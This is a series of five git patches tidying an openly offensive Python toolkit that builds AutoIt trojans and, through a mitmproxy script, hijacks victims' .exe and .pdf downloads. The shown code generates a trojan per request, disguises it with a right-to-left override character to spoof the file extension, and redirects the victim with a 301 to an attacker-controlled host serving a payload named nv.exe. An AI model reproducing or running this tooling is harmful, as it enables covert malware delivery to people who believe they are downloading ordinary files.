From 6aeab7d9ba5cb4e6b4a547aa878a2837b5ee138d Mon Sep 17 00:00:00 2001
From: moodule <moodule@protonmail.com>
Date: Sun, 6 Sep 2020 13:42:28 +0200
Subject: [PATCH 1/5] Ignore temporary build files

---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .gitignore

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..0557015
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+trojan.txt

From b5791338c06675bead4f3d66b5acae6b20117e96 Mon Sep 17 00:00:00 2001
From: moodule <moodule@protonmail.com>
Date: Sun, 6 Sep 2020 13:55:51 +0200
Subject: [PATCH 2/5] Fix typos

---
 Trojan.py           |  9 +++------
 mitmproxy_script.py | 16 +++++++---------
 trojan_factory.py   |  2 +-
 3 files changed, 11 insertions(+), 16 deletions(-)

diff --git a/Trojan.py b/Trojan.py
index 990b422..bda27a9 100644
--- a/Trojan.py
+++ b/Trojan.py
@@ -4,7 +4,6 @@
 import zipfile
 
 
-
 TROJAN_SOURCE_CODE_FILE = "trojan.txt"
 AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe"
 
@@ -35,8 +34,7 @@ def __init__(self, url1, url2, icon, out_file):
 		file_type = url1.split(".")[-1].replace("#", "")
 		self.icon = self.set_icon(icon, file_type)
 		self.out_file = out_file
-		
-					
+
 	def create(self):
 		urls = 'Local $urls = "' +  self.url1 + "," +self.url2 + '"\n'
 		with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file:
@@ -44,7 +42,7 @@ def create(self):
 
 	def compile(self):
 		subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True)
-	
+
 	def set_icon(self, icon, file_type):
 		icons_directory = os.path.dirname(os.path.realpath(__file__)) + "/icons"
 		if icon == None:
@@ -52,11 +50,10 @@ def set_icon(self, icon, file_type):
 
 		if not os.path.isfile(icon) :
 			print("[-] Can't find icon at " + icon)
-			print("[-] Using generaic icon.")
+			print("[-] Using generic icon.")
 			icon = icons_directory + "/generic.ico"
 		return icon
 
-	
 	def zip(self, file_to_zip):
 		os.chdir(os.path.dirname(file_to_zip))
 		trojan_name = file_to_zip.split("/")[-1]
diff --git a/mitmproxy_script.py b/mitmproxy_script.py
index 22e411e..a3a4c6d 100644
--- a/mitmproxy_script.py
+++ b/mitmproxy_script.py
@@ -12,15 +12,14 @@
 
 def request(flow):
 	#code to handle request flows
-	
+
 	if flow.request.host != IP and flow.request.pretty_url.endswith(tuple(TARGET_TEXTENSIONS)):
 		print("[+] Got interesting flow")
-		
+
 		front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0]
 		front_file = flow.request.pretty_url + "#"
 		download_file_name = front_file_name + ".exe"
 		trojan_file = WEB_ROOT + download_file_name
-		
 
 		print("[+] Generating a trojan for " + flow.request.pretty_url)
 
@@ -28,17 +27,16 @@ def request(flow):
 		trojan.create()
 		trojan.compile()
 
-		if SPOOF_EXTENSION == True: 
+		if SPOOF_EXTENSION:
 			print("[+] Renaming trojan to spoof its extension")
 			front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
 			if front_file_extension != "exe":
 				new_name = front_file_name + "‮" + "".join(reversed(front_file_extension))  + ".exe"
 				spoofed_file = WEB_ROOT + new_name
 				os.rename(trojan_file, spoofed_file)
-						
+
 				trojan.zip(spoofed_file)
 				download_file_name = front_file_name + ".zip"
-		
-		
-		torjan_download_url = "http://" + IP + "/" + download_file_name
-		flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": torjan_download_url})
+
+		trojan_download_url = "http://" + IP + "/" + download_file_name
+		flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url})
diff --git a/trojan_factory.py b/trojan_factory.py
index 621a617..846449f 100644
--- a/trojan_factory.py
+++ b/trojan_factory.py
@@ -24,5 +24,5 @@
 trojan.create()
 trojan.compile()
 
-if options.zip: 
+if options.zip:
 	trojan.zip(options.out_file_path)

From ced42c4dcc5d1acce7e5eb8a2f107ffbf31e1d5b Mon Sep 17 00:00:00 2001
From: moodule <moodule@protonmail.com>
Date: Sun, 6 Sep 2020 13:58:31 +0200
Subject: [PATCH 3/5] Remove unused import, lint

---
 Trojan.py                         |   4 ++--
 __pycache__/Trojan.cpython-37.pyc | Bin 0 -> 2438 bytes
 mitmproxy_script.py               |   5 ++---
 trojan_factory.py                 |   2 +-
 4 files changed, 5 insertions(+), 6 deletions(-)
 create mode 100644 __pycache__/Trojan.cpython-37.pyc

diff --git a/Trojan.py b/Trojan.py
index bda27a9..d4335b5 100644
--- a/Trojan.py
+++ b/Trojan.py
@@ -7,7 +7,7 @@
 TROJAN_SOURCE_CODE_FILE = "trojan.txt"
 AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe"
 
-trojan_code = """
+TROJAN_CODE = """
 #include <StaticConstants.au3>
 #include <WindowsConstants.au3>
 Local $urlsArray = StringSplit($urls, ",", 2 )
@@ -38,7 +38,7 @@ def __init__(self, url1, url2, icon, out_file):
 	def create(self):
 		urls = 'Local $urls = "' +  self.url1 + "," +self.url2 + '"\n'
 		with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file:
-			trojan_file.write(urls + trojan_code)
+			trojan_file.write(urls + TROJAN_CODE)
 
 	def compile(self):
 		subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True)
diff --git a/__pycache__/Trojan.cpython-37.pyc b/__pycache__/Trojan.cpython-37.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..5a342fa13ce5ede7469ccecb3e91deee659456a4
GIT binary patch
literal 2438
zcmZWq-Ez}L6yB9(Sy2)~DTATYAJs4v(bR^}p?|=H28T(9N!t7rs<voUNl65X<nFGU
z;Bl_tw$oQgF8eZl0NwVguaKMeJFD1)bUk}?wC9}F*>Asd{Ppy-!!UmMYdv_{VC-*t
z8I2m0c}#g5B4#nqm|s1)&-J_E8?oWn;+k*9reA-^;(BboVzKqo@U57yF|Y9tV%hS*
zQKEPj=54j71`8cg6sptSP4lD^i}bf7h&tbjVoQWO?qZrH(!I9#`E9RrzpsiVb&H;J
z-MvIVlf9&k86I)QoXcq*W&JpD@2sg%rO`r>OBLoyw!{9ddne3~(>yMA<th84A__D2
zN?&C1z7XLH_pZC9M4E4{^|Dl5(}r2MHQSnX=UmTOEQEG;m+})q&cqc-Nh3ITQ0(Se
z5ytec!#!t0ZYNoW?4!QIns)V^<z!Dei~T%09V0hZA9;?8ah%-tXwO-<3f9K)C#!r{
zldbMvZ#C&<VMHInCdm6~`+5hdw_4SP|BD%UQ?_us{D$v?R3woq1c5TYp6v9n;9h+r
zhjD6fS;`ajFac)Ox39=?{H%NPGt4Rna$Cp>i6qC-m1Q+ieF0ow2Rhw6))2YwS9kB;
z3$Q)TwX_p%B~C=F8Vv)=Jf{2<B4NZ$@RG;ID@NRmO+3wtnSMQP#5Ufocp`T2Y{Zjb
z=~QX0Yko#`Y(c}qG%*)2<(CjcK4bwK8jyU*53v6szHo^h=r0@^`}H9^Fo(5a{g8a>
zLle@98FsHPm%RPYzZggSa*3KKO;GNpmUCrY64}azsBW*cWuk&KD)Q3Q(k}Wc*u)ii
zR%yy4+Z3o%CTtQ@B&H$C3GxWki(c|46KAn<bfdFf>?EDdEL0g4+HN79%O3dAsY-D(
z)Ysdo4&Ls)DD5Cf^Hc@F2Z)!tFK`RL3;YZp%pCiTd?M7J9@Hf!Ff~&1P+}nUj5S$o
zG#NAwt=44wTp0>?@zVI?{Jt?XfE8EuCOhPuJw{jgj;*pMcxt=`Gbc(D>}nnH*@4k=
zO1|q^ug_naMK8(A=KAW&H}{u=wUv$4g>JC0@}L_mE<Ng&^<9ywq?|mqlfkQrGsw}W
z8<75F1%-xJqgIKx;89wUNJ5odg)WH=j9=tad@y~CLuDPKKxmBlLj6+V<T1`%;h=y3
zp#VHgXqeD&`k1B_H-0yGb#{AsU{POmTZ2Z+?V!`N1~!zHzJfMEOP~e;(pvX8$V1%)
z%y4A?m!2r1L`vU8SIf%A{f+gx?vt*#fNV5LG+jKd0XTiyMpW$dK%tM}EUBOvADkH-
zwK7F?(=_OuR44kze}Y11JutMaDf5sj1Gm0k8=?}Q8{)>Wrnx{^R7@cM`VfBdiLzoa
zp~+r?2hi*Egug|M8R~x!Akv{qkVm{TFxyZE%^yGc*<A?pkCeNK&hC=g4V7CNHY8fO
zyOrdLNF!})52iZD?-Y*;GzwXoy-;nJjW`u~xRaDN?mN><C<I+jL20Fuw6fmA--7bY
z3OikPGdQ?EqZ13TMb#`%!73)<)W(!llEfgJpEahyBOAYQO^qr((!j&<4TQhPf?@|8
z_!<Yml<);c{J<RbAk-7s^!goI4R>H(!W}5<Sp#^Ed3InA4T{&5W-kk>bwS?~biIOj
z43GzDPn?GeikUk_oOlz$#cNrQwsBVRA#~9qL6u*1pax<HE5G5Vy+tUZ3EMGb{-g#}
z6#=})Wk<04HdX@CPGMKpVE6)CNNRPApF<aVhYy@%Qo^|G+0?TrHV8^52#{$XT`(x8
zg5cMFm{k^W4&mYwiT6p+orvos=u%DyDtkd!@E)e_f3{&a?7CgEC-u755bu(YOTr_e
kYm3~)MG_QzVne;ZZYK7fDz|&&A&Eak0J~;#^KH}k4^M?!JOBUy

literal 0
HcmV?d00001

diff --git a/mitmproxy_script.py b/mitmproxy_script.py
index a3a4c6d..8b985d3 100644
--- a/mitmproxy_script.py
+++ b/mitmproxy_script.py
@@ -1,7 +1,6 @@
 import mitmproxy
-import subprocess
 import os
-from Trojan import *
+from Trojan import Trojan
 
 
 IP = "10.20.215.11"
@@ -31,7 +30,7 @@ def request(flow):
 			print("[+] Renaming trojan to spoof its extension")
 			front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
 			if front_file_extension != "exe":
-				new_name = front_file_name + "‮" + "".join(reversed(front_file_extension))  + ".exe"
+				new_name = front_file_name + "".join(reversed(front_file_extension))  + ".exe"
 				spoofed_file = WEB_ROOT + new_name
 				os.rename(trojan_file, spoofed_file)
 
diff --git a/trojan_factory.py b/trojan_factory.py
index 846449f..f897e2e 100644
--- a/trojan_factory.py
+++ b/trojan_factory.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 import optparse
-from Trojan import *
+from Trojan import Trojan
 
 
 parser = optparse.OptionParser()

From 9f2a923ba48cfbda5e7cbc656f38f42bb3099854 Mon Sep 17 00:00:00 2001
From: moodule <moodule@protonmail.com>
Date: Sun, 6 Sep 2020 14:13:20 +0200
Subject: [PATCH 4/5] Generate the trojan directly with the spoofed extension:
 no need to rename it

---
 mitmproxy_script.py | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)

diff --git a/mitmproxy_script.py b/mitmproxy_script.py
index 8b985d3..0707962 100644
--- a/mitmproxy_script.py
+++ b/mitmproxy_script.py
@@ -16,8 +16,13 @@ def request(flow):
 		print("[+] Got interesting flow")
 
 		front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0]
+		front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
+
 		front_file = flow.request.pretty_url + "#"
 		download_file_name = front_file_name + ".exe"
+		if SPOOF_EXTENSION and front_file_extension != "exe":
+			print("[+] Renaming trojan to spoof its extension")
+			download_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension))  + ".exe"
 		trojan_file = WEB_ROOT + download_file_name
 
 		print("[+] Generating a trojan for " + flow.request.pretty_url)
@@ -27,15 +32,8 @@ def request(flow):
 		trojan.compile()
 
 		if SPOOF_EXTENSION:
-			print("[+] Renaming trojan to spoof its extension")
-			front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
-			if front_file_extension != "exe":
-				new_name = front_file_name + "".join(reversed(front_file_extension))  + ".exe"
-				spoofed_file = WEB_ROOT + new_name
-				os.rename(trojan_file, spoofed_file)
-
-				trojan.zip(spoofed_file)
-				download_file_name = front_file_name + ".zip"
+			trojan.zip(trojan_file)
+			download_file_name = front_file_name + ".zip"
 
 		trojan_download_url = "http://" + IP + "/" + download_file_name
 		flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url})

From a796bee10554842406599b7337e21bf703d80987 Mon Sep 17 00:00:00 2001
From: moodule <moodule@protonmail.com>
Date: Sun, 6 Sep 2020 14:17:57 +0200
Subject: [PATCH 5/5] Distinguish trojan & download name/url, in case it is
 zipped

---
 mitmproxy_script.py | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/mitmproxy_script.py b/mitmproxy_script.py
index 0707962..cd1d279 100644
--- a/mitmproxy_script.py
+++ b/mitmproxy_script.py
@@ -5,7 +5,7 @@
 
 IP = "10.20.215.11"
 TARGET_TEXTENSIONS = [".exe", ".pdf"]
-EVIL_FILE = "http://10.20.215.11/nv.exe"
+EVIL_FILE_URL = "http://10.20.215.11/nv.exe"
 WEB_ROOT = "/var/www/html/"
 SPOOF_EXTENSION = True
 
@@ -18,16 +18,17 @@ def request(flow):
 		front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0]
 		front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
 
-		front_file = flow.request.pretty_url + "#"
-		download_file_name = front_file_name + ".exe"
+		front_file_url = flow.request.pretty_url + "#"
+		trojan_file_name = front_file_name + ".exe"
+		download_file_name = trojan_file_name
 		if SPOOF_EXTENSION and front_file_extension != "exe":
 			print("[+] Renaming trojan to spoof its extension")
-			download_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension))  + ".exe"
-		trojan_file = WEB_ROOT + download_file_name
+			trojan_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension))  + ".exe"
+		trojan_file = WEB_ROOT + trojan_file_name
 
 		print("[+] Generating a trojan for " + flow.request.pretty_url)
 
-		trojan = Trojan(front_file, EVIL_FILE, None, trojan_file)
+		trojan = Trojan(front_file_url, EVIL_FILE_URL, None, trojan_file)
 		trojan.create()
 		trojan.compile()